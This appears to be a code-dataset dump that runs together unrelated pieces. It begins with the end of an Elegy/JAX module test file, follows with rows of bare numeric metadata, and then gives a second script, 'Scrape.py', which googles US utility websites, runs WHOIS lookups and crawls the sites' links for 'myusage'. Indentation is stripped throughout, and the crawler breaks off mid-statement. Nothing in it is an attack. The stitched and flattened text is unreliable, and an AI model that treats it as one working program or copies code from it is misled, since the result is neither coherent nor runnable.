parameters = m.get_parameters()
states = m.get_states()
assert parameters == {}
assert m.parameters_size() == 0
m.set_parameters(current_parameters)
m.set_states(current_states)
assert m.get_parameters()["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear1.get_parameters()["w"][0, 0] == -1
assert m.linear1.get_parameters()["b"][0] == -1
class ModuleDynamicTest(TestCase):
class Linear(elegy.Module):
def __init__(self, units):
super().__init__()
self.units = units
def call(self, x):
w = elegy.get_parameter(
"w", [x.shape[-1], self.units], initializer=jnp.ones
)
b = elegy.get_parameter("b", [self.units], initializer=jnp.ones)
n = elegy.get_state("n", [], dtype=jnp.int32, initializer=jnp.zeros)
elegy.set_state("n", n + 1)
y = jnp.dot(x, w) + b
elegy.add_loss("activation_sum", jnp.sum(y))
elegy.add_metric("activation_mean", jnp.mean(y))
return y
class MyModule(elegy.Module):
def call(self, x) -> np.ndarray:
x = ModuleDynamicTest.Linear(6)(x)
x = ModuleDynamicTest.Linear(7)(x)
self.bias = elegy.get_parameter("bias", [x.shape[-1]], initializer=jnp.ones)
return x + self.bias * 10
def test_basic(self):
x = np.random.uniform(-1, 1, size=(4, 5))
module = ModuleDynamicTest.MyModule()
module.init()(x)
y: np.ndarray
y, context = module.apply()(x)
assert y.shape == (4, 7)
print(module.get_parameters)
def test_get_parameters(self):
x = np.random.uniform(-1, 1, size=(4, 5))
m = ModuleDynamicTest.MyModule()
m.init()(x)
assert "bias" in m.get_parameters()
assert "linear" in m.get_parameters()
assert "w" in m.get_parameters()["linear"]
assert "b" in m.get_parameters()["linear"]
assert m.linear.get_states()["n"] == 0
assert m.get_states()["linear"]["n"] == 0
assert "linear_1" in m.get_parameters()
y: np.ndarray
y, context = m.apply(get_summaries=True)(x)
assert y.shape == (4, 7)
assert "bias" in m.get_parameters()
assert "linear" in m.get_parameters()
assert "w" in m.get_parameters()["linear"]
assert "b" in m.get_parameters()["linear"]
assert m.linear.get_states()["n"] == 1
assert m.get_states()["linear"]["n"] == 1
assert "linear_1" in m.get_parameters()
assert "activation_sum_loss" in context.losses
assert "my_module/linear/activation_mean" in context.metrics
assert "my_module/linear_1/activation_mean" in context.metrics
assert context.summaries[0][:2] == (m.linear, "my_module/linear")
assert context.summaries[0][2].shape == (4, 6)
assert context.summaries[1][:2] == (m.linear_1, "my_module/linear_1")
assert context.summaries[1][2].shape == (4, 7)
assert context.summaries[2][:2] == (m, "my_module")
assert context.summaries[2][2].shape == (4, 7)
m.set_parameters(jax.tree_map(lambda x: -x, m.get_parameters()))
assert m.get_parameters()["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear_1.get_parameters()["w"][0, 0] == -1
assert m.linear_1.get_parameters()["b"][0] == -1
assert m.parameters_size(include_submodules=False) == 7
current_parameters = m.get_parameters()
current_states = m.get_states()
m.reset()
assert m.get_parameters() == {}
assert m.parameters_size() == 0
m.set_parameters(current_parameters)
m.set_states(current_states)
assert m.get_parameters()["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear_1.get_parameters()["w"][0, 0] == -1
assert m.linear_1.get_parameters()["b"][0] == -1
| 33.104167
| 88
| 0.572813
| 1,040
| 7,945
| 4.230769
| 0.082692
| 0.121136
| 0.066818
| 0.036818
| 0.892955
| 0.8775
| 0.868409
| 0.850455
| 0.845455
| 0.845455
| 0
| 0.027932
| 0.274512
| 7,945
| 239
| 89
| 33.242678
| 0.735427
| 0
| 0
| 0.766667
| 0
| 0
| 0.066331
| 0.016614
| 0
| 0
| 0
| 0
| 0.422222
| 1
| 0.061111
| false
| 0
| 0.044444
| 0
| 0.161111
| 0.011111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
71d19262f68740221520f73674972574d4f1e690
| 52,285
|
py
|
Python
|
Scrape.py
|
ReedGraff/Data-Science-Scraping
|
14ab283a5477827447f502c3c76612df380912e3
|
[
"MIT"
] | null | null | null |
Scrape.py
|
ReedGraff/Data-Science-Scraping
|
14ab283a5477827447f502c3c76612df380912e3
|
[
"MIT"
] | null | null | null |
Scrape.py
|
ReedGraff/Data-Science-Scraping
|
14ab283a5477827447f502c3c76612df380912e3
|
[
"MIT"
] | null | null | null |
from googlesearch import search
from htmldate import find_date
import pandas as pd
import numpy as np
# to search
query = ['Tuskegee,AL', 'West Kentucky Cooperative', 'ACE Power,MS', 'Albertville,AL', 'Benson,NC', 'Benton County,TN', 'Blakely,GA', 'Blue Ridge Mountain,GA', 'Bolivar,TN', 'Caney Fork EC,TN', 'Cleveland Utilities,TN', 'Clinton,TN', 'Columbia Power and Water,TN', 'Cowlitz PUD,WA', 'Denton,TX', 'Dickson Electric,TN', 'Dixie EC,AL', 'Dothan,AL', 'Douglas,GA', 'Franklin EPB,KY', 'Fulton,KY', 'Glasgow EPB,KY', 'Guntersville,AL', 'Holly Springs,MS', 'Hopkinsville,KY', 'Humboldt Utilities,TN', 'JEA,FL', 'Kansas City BPU,KS', 'La Grange,NC', 'Lake Worth Beach,FL', 'Lenoir City,TN', 'Lexington Electric,TN', 'MLGW,TN', 'Marshall-DeKalb EC,AL', 'Mayfield,KY', 'Midstate,OR', 'Mt Pleasant,TN', 'New Bern,NC', 'Ocala,FL', 'Orlando,FL', 'Pickwick EC,TN', 'Ripley Power and Light,TN', 'Rockwood,TN', 'Rush Shelby,IN', 'Russellville EPB,KY', 'Scottsboro EPB,AL', 'Selma,NC', 'Shelbyville,TN', 'Southwest TN,TN', 'St Croix EC,WI', 'TVEC,TN', 'Tarrant Electric,AL', 'Tombigbee EPA,MS', 'Tri-State,GA', 'Union City,TN', 'Wilson Internet,NC', 'Wilson,NC']
utility_links = ['https://www.yourubt.com/', 'https://wkrecc.com/index.php/18-billing', 'https://ace-power.com/account/payment-options/', 'http://www.mub-albertville.com/', 'https://www.townofbenson.com/2191/Bill-Payment', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://cityofblakely.net/pay-online/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://www.bolivarutility.com/', 'https://www.caneyforkec.com', 'http://www.clevelandutilities.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://cpws.com/my-account/', 'https://www.cowlitzpud.org/customer-services/pay-my-bill/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://dicksonelectric.com/', 'https://www.dixie.coop/online-account-access', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'http://www.franklinepb.com/bill-payment-options', 'https://www.fulton-ky.com/frequently-asked-questions/', 'http://www.glasgowepb.net/?page_id=343', 'https://guntersvilleal.org/departments/utilites/', 'http://www.hsutilities.com/', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://www.humboldtutilities.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.bpu.com/', 'https://lagrangenc.com/703/Online-Billing', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.lcub.com/', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://mdec.org/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://midstateelectric.coop/payment-options', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'http://www.pickwickec.com/bill-payment-information/', 'https://ripleypower.com/account/payment-options.php', 'https://cityofrockwood.com/online-bill-pay', 'https://www.rse.coop/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'https://www.sepb.net/payment-2/bill-pay/', 'https://selma-nc.com/departments/customer-service/', 'http://www.shelbyvillepower.com/', 'https://www.stemc.com/my-payment-options', 'https://www.scecnet.net/content/pay-my-bill', 'https://www.tvec.com/index.asp?fullsite=1', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tombigbeeelectric.com/payments', 'https://www.tsemc.net/my-account/pay-bill-online/', 'http://unioncitytn.gov/pay-online.html', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options']
gov_links = ['https://www.cityofalbertville.com/', 'https://www.townofbenson.com/', 'https://www.bentoncountytn.gov/', 'https://cityofblakely.net/', 'https://www.cityofblueridgega.gov/', 'https://www.cityofbolivar.com/', 'https://www.caneyforkec.com', 'http://www.clevelandutilities.com/', 'http://www.clintontn.net/', 'https://cpws.com/', 'https://www.cowlitzpud.org/', 'https://www.dentoncounty.gov/', 'https://dicksonelectric.com/', 'https://www.dixie.coop/', 'https://www.dothan.org/', 'https://www.cityofdouglasga.gov/', 'http://www.franklinepb.com/', 'https://www.fulton-ky.com/', 'http://www.glasgowepb.net/', 'https://guntersvilleal.org/', 'https://hollyspringsmsus.com/', 'https://www.hopkinsvilleky.us/', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
New_Utility_Links = ['https://www.ci.richland.wa.us/departments/energy-services', 'https://cityofcovington.org/index.php?section=covington_utilities3', 'http://unioncitytn.gov/pay-online.html', 'https://dicksonelectric.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.sepb.net/payment-2/bill-pay/', 'https://www.fulton-ky.com/frequently-asked-questions/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://midstateelectric.coop/payment-options', 'https://wkrecc.com/index.php/18-billing', 'https://mdec.org/', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://www.caneyforkec.com/', 'https://www.humboldtutilities.com/', 'http://www.hsutilities.com/', 'https://www.cityofmadison.com/water', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://ace-power.com/account/payment-options/', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.bolivarutility.com/', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.bpu.com/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://www.stemc.com/my-payment-options', 'https://www.dixie.coop/online-account-access', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'https://cityofblakely.net/pay-online/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://www.salemmo.com/city/government/departments/utility_department/index.php', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.tsemc.net/my-account/pay-bill-online/', 'https://cpws.com/my-account/', 'https://www.lcub.com/', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'http://www.pickwickec.com/bill-payment-information/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.tombigbeeelectric.com/payments', 'https://cityofrockwood.com/online-bill-pay', 'http://www.shelbyvillepower.com/', 'https://www.yourubt.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://www.rse.coop/', 'https://www.geus.org/', 'https://selma-nc.com/departments/customer-service/', 'http://www.clevelandutilities.com/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://guntersvilleal.org/departments/utilites/', 'https://ripleypower.com/account/payment-options.php', 'http://www.mub-albertville.com/', 'http://www.franklinepb.com/bill-payment-options', 'https://lagrangenc.com/703/Online-Billing', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'https://www.townofbenson.com/2191/Bill-Payment', 'https://www.scecnet.net/content/pay-my-bill', 'http://www.glasgowepb.net/?page_id=343', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tvec.com/index.asp?fullsite=1']
"""
for i in query:
for j in search("Official government website for " + i, tld="co.in", num=1, stop=1, pause=3):
print(j)
"""
"""
find_date('http://blog.python.org/2016/12/python-360-is-now-available.html')
for i in utility_links:
if i == "https://www.caneyforkec.com" or i == "https://lakeworthbeachfl.gov/payment-portal/" or i == "https://midstateelectric.coop/payment-options" or i == "https://www.rse.coop/" or i == "https://www.stemc.com/my-payment-options" or i == "https://www.scecnet.net/content/pay-my-bill" or i == "https://www.tsemc.net/my-account/pay-bill-online/" or i == "http://unioncitytn.gov/pay-online.html":
print("None")
else:
print(find_date(i, original_date=True))
# pip htmldate -max MAXDATE -u [utility_links]
"""
"""
print(""*5)
for i in gov_links:
if i == "https://www.caneyforkec.com" or i == "https://lakeworthbeachfl.gov/payment-portal/" or i == "https://midstateelectric.coop/payment-options" or i == "https://www.rse.coop/" or i == "https://www.stemc.com/my-payment-options" or i == "https://www.scecnet.net/content/pay-my-bill" or i == "https://www.tsemc.net/my-account/pay-bill-online/" or i == "http://unioncitytn.gov/pay-online.html":
print("None")
else:
print(find_date(i, original_date=True))
print(""*5)
"""
"""
import whois
w = whois.whois('https://www.humboldtutilities.com/')
print(w)
"""
"""
customers_url = "https://docs.google.com/spreadsheets/d/e/2PACX-1vQcmuZiLz645g0LV2MetG-9Uj4EeTxGMVGPR7D4U88hh-pgEyLKM7nVAuC3k4-6peJ6MevszPQ01IE5/pub?output=csv"
customers_df = pd.read_csv(customers_url)
customers_df = customers_df.loc[:, customers_df.columns.intersection(["Customer","Reed Link"])]
customers_df['Reed Link'] = customers_df['Reed Link'].replace(np.nan, 0)
customers_df.rename(columns = {"Reed Link": "Reed_Link"}, inplace=True)
df_new = customers_df.query("Reed_Link==0")
df_new.set_index("Customer")
ukn = df_new["Customer"].tolist()
for i in ukn:
for j in search("Utility website for " + i, tld="co.in", num=1, stop=1, pause=3):
print(j)
"""
"""
import whois
import json
import time
New_Utility_Links = ['https://www.ci.richland.wa.us/departments/energy-services', 'https://cityofcovington.org/index.php?section=covington_utilities3', 'http://unioncitytn.gov/pay-online.html', 'https://dicksonelectric.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.sepb.net/payment-2/bill-pay/', 'https://www.fulton-ky.com/frequently-asked-questions/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://midstateelectric.coop/payment-options', 'https://wkrecc.com/index.php/18-billing', 'https://mdec.org/', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://www.caneyforkec.com/', 'https://www.humboldtutilities.com/', 'http://www.hsutilities.com/', 'https://www.cityofmadison.com/water', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://ace-power.com/account/payment-options/', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.bolivarutility.com/', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.bpu.com/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://www.stemc.com/my-payment-options', 'https://www.dixie.coop/online-account-access', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'https://cityofblakely.net/pay-online/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://www.salemmo.com/city/government/departments/utility_department/index.php', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.tsemc.net/my-account/pay-bill-online/', 'https://cpws.com/my-account/', 'https://www.lcub.com/', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'http://www.pickwickec.com/bill-payment-information/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.tombigbeeelectric.com/payments', 'https://cityofrockwood.com/online-bill-pay', 'http://www.shelbyvillepower.com/', 'https://www.yourubt.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://www.rse.coop/', 'https://www.geus.org/', 'https://selma-nc.com/departments/customer-service/', 'http://www.clevelandutilities.com/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://guntersvilleal.org/departments/utilites/', 'https://ripleypower.com/account/payment-options.php', 'http://www.mub-albertville.com/', 'http://www.franklinepb.com/bill-payment-options', 'https://lagrangenc.com/703/Online-Billing', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'https://www.townofbenson.com/2191/Bill-Payment', 'https://www.scecnet.net/content/pay-my-bill', 'http://www.glasgowepb.net/?page_id=343', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tvec.com/index.asp?fullsite=1']
DNS_0 = []
DNS_1 = []
DNS_2 = []
DNS_3 = []
DNS_4 = []
t = (5)
for i in New_Utility_Links:
data = whois.whois(i)
if "name" in data:
DNS_0.append(data["name"])
elif "registrant_name" in data:
DNS_0.append(data["registrant_name"])
elif "admin_name" in data:
DNS_0.append(data["admin_name"])
else:
DNS_0.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "name" in data:
DNS_1.append(data["name"])
elif "registrant_name" in data:
DNS_1.append(data["registrant_name"])
elif "admin_name" in data:
DNS_1.append(data["admin_name"])
else:
DNS_1.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "name" in data:
DNS_2.append(data["name"])
elif "registrant_name" in data:
DNS_2.append(data["registrant_name"])
elif "admin_name" in data:
DNS_2.append(data["admin_name"])
else:
DNS_2.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "name" in data:
DNS_3.append(data["name"])
elif "registrant_name" in data:
DNS_3.append(data["registrant_name"])
elif "admin_name" in data:
DNS_3.append(data["admin_name"])
else:
DNS_3.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "name" in data:
DNS_4.append(data["name"])
elif "registrant_name" in data:
DNS_4.append(data["registrant_name"])
elif "admin_name" in data:
DNS_4.append(data["admin_name"])
else:
DNS_4.append("None")
DNS_df = pd.DataFrame(
{'DNS_0': DNS_0,
'DNS_1': DNS_1,
'DNS_2': DNS_2,
'DNS_3': DNS_3,
'DNS_4': DNS_4,
})
print(DNS_df)
DNS_df.replace(to_replace ="none", value ="nan")
DNS_df.replace(to_replace ="None", value ="nan")
print(DNS_df)
DNS_df["DNS_0"].fillna(DNS_df["DNS_1"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_2"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_3"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_4"])
print(DNS_df)
DNS_df = DNS_df.drop(["DNS_1", "DNS_2", "DNS_3", "DNS_4"], axis=1)
print(DNS_df)
final = DNS_df["DNS_0"].tolist()
for i in final:
print(i)
"""
"""
import whois
import json
import time
New_Utility_Links = ['https://www.ci.richland.wa.us/departments/energy-services', 'https://cityofcovington.org/index.php?section=covington_utilities3', 'http://unioncitytn.gov/pay-online.html', 'https://dicksonelectric.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.sepb.net/payment-2/bill-pay/', 'https://www.fulton-ky.com/frequently-asked-questions/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://midstateelectric.coop/payment-options', 'https://wkrecc.com/index.php/18-billing', 'https://mdec.org/', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://www.caneyforkec.com/', 'https://www.humboldtutilities.com/', 'http://www.hsutilities.com/', 'https://www.cityofmadison.com/water', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://ace-power.com/account/payment-options/', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.bolivarutility.com/', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.bpu.com/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://www.stemc.com/my-payment-options', 'https://www.dixie.coop/online-account-access', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'https://cityofblakely.net/pay-online/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://www.salemmo.com/city/government/departments/utility_department/index.php', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.tsemc.net/my-account/pay-bill-online/', 'https://cpws.com/my-account/', 'https://www.lcub.com/', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'http://www.pickwickec.com/bill-payment-information/', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.tombigbeeelectric.com/payments', 'https://cityofrockwood.com/online-bill-pay', 'http://www.shelbyvillepower.com/', 'https://www.yourubt.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://www.rse.coop/', 'https://www.geus.org/', 'https://selma-nc.com/departments/customer-service/', 'http://www.clevelandutilities.com/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://guntersvilleal.org/departments/utilites/', 'https://ripleypower.com/account/payment-options.php', 'http://www.mub-albertville.com/', 'http://www.franklinepb.com/bill-payment-options', 'https://lagrangenc.com/703/Online-Billing', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'https://www.townofbenson.com/2191/Bill-Payment', 'https://www.scecnet.net/content/pay-my-bill', 'http://www.glasgowepb.net/?page_id=343', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tvec.com/index.asp?fullsite=1']
DNS_0 = []
DNS_1 = []
DNS_2 = []
DNS_3 = []
DNS_4 = []
t = (5)
for i in New_Utility_Links:
data = whois.whois(i)
if "registrar" in data:
DNS_0.append(data["registrar"])
elif "registrar_name" in data:
DNS_0.append(data["registrar_name"])
else:
DNS_0.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "registrar" in data:
DNS_1.append(data["registrar"])
elif "registrar_name" in data:
DNS_1.append(data["registrar_name"])
else:
DNS_1.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "registrar" in data:
DNS_2.append(data["registrar"])
elif "registrar_name" in data:
DNS_2.append(data["registrar_name"])
else:
DNS_2.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "registrar" in data:
DNS_3.append(data["registrar"])
elif "registrar_name" in data:
DNS_3.append(data["registrar_name"])
else:
DNS_3.append("None")
time.sleep(t)
for i in New_Utility_Links:
data = whois.whois(i)
if "registrar" in data:
DNS_4.append(data["registrar"])
elif "registrar_name" in data:
DNS_4.append(data["registrar_name"])
else:
DNS_4.append("None")
DNS_df = pd.DataFrame(
{'DNS_0': DNS_0,
'DNS_1': DNS_1,
'DNS_2': DNS_2,
'DNS_3': DNS_3,
'DNS_4': DNS_4,
})
print(DNS_df)
DNS_df.replace(to_replace ="none", value ="nan")
DNS_df.replace(to_replace ="None", value ="nan")
print(DNS_df)
DNS_df["DNS_0"].fillna(DNS_df["DNS_1"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_2"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_3"])
DNS_df["DNS_0"].fillna(DNS_df["DNS_4"])
print(DNS_df)
DNS_df = DNS_df.drop(["DNS_1", "DNS_2", "DNS_3", "DNS_4"], axis=1)
print(DNS_df)
final = DNS_df["DNS_0"].tolist()
for i in final:
print(i)
"""
"""
# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()
total_urls_visited = 0
urls = []
def is_valid(url):
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_website_links(url):
# all URLs of `url`
urls = set()
# domain name of the URL without the protocol
domain_name = urlparse(url).netloc
soup = BeautifulSoup(requests.get(url).content, "html.parser")
for a_tag in soup.findAll("a"):
href = a_tag.attrs.get("href")
if href == "" or href is None:
# href empty tag
continue
# join the URL if it's relative (not absolute link)
href = urljoin(url, href)
parsed_href = urlparse(href)
# remove URL GET parameters, URL fragments, etc.
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if not is_valid(href):
# not a valid URL
continue
if href in internal_urls:
# already in the set
continue
if domain_name not in href:
# external link
if href not in external_urls:
#print(f"{GRAY}[!] External link: {href}{RESET}")
external_urls.add(href)
continue
#print(f"{GREEN}[*] Internal link: {href}{RESET}")
urls.add(href)
internal_urls.add(href)
return urls
def crawl(url, max_urls=30):
global total_urls_visited
total_urls_visited += 1
#print(f"{YELLOW}[*] Crawling: {url}{RESET}")
links = get_all_website_links(url)
for link in links:
if total_urls_visited > max_urls:
break
crawl(link, max_urls=max_urls)
"""
"""
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
query = "myusage"
query_return = []
for i in New_Utility_Links:
try:
print("Testing " + i)
# Test 1st page & capture all internal and external
# test all internal for query
internal_urls = []
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in internal_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
internal_urls.append(href)
continue
#print(str(len(internal_urls)))
#print(str(len(external_urls)))
if query in external_urls:
query_return.append("True")
else:
for j in internal_urls:
try:
#print("Testing " + j + " inside of " + i)
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
except:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
for boolean in query_return:
print(boolean)
"""
"""
#JEA 500?
import pandas as pd
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os
query = "myusage"
query_return = []
for i in New_Utility_Links:
try:
df = pd.DataFrame({"URL":[i],"BOOL":["True"]})
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
os.system('cls')
print(df)
print(""*2)
print("Testing " + i)
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
# URL TESTING
if query in external_urls:
query_return.append("True")
else:
for j in df["URL"]:
if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
try:
# Start Time
state = "True"
max_time = 15
start_time = time.time() # remember when we started
while (time.time() - start_time) < max_time and state == "True":
# End Time
#print("Testing " + j + " inside of " + i)
df.loc[df['URL'] == j, 'BOOL'].iloc[0] = "True"
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
state = "False"
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
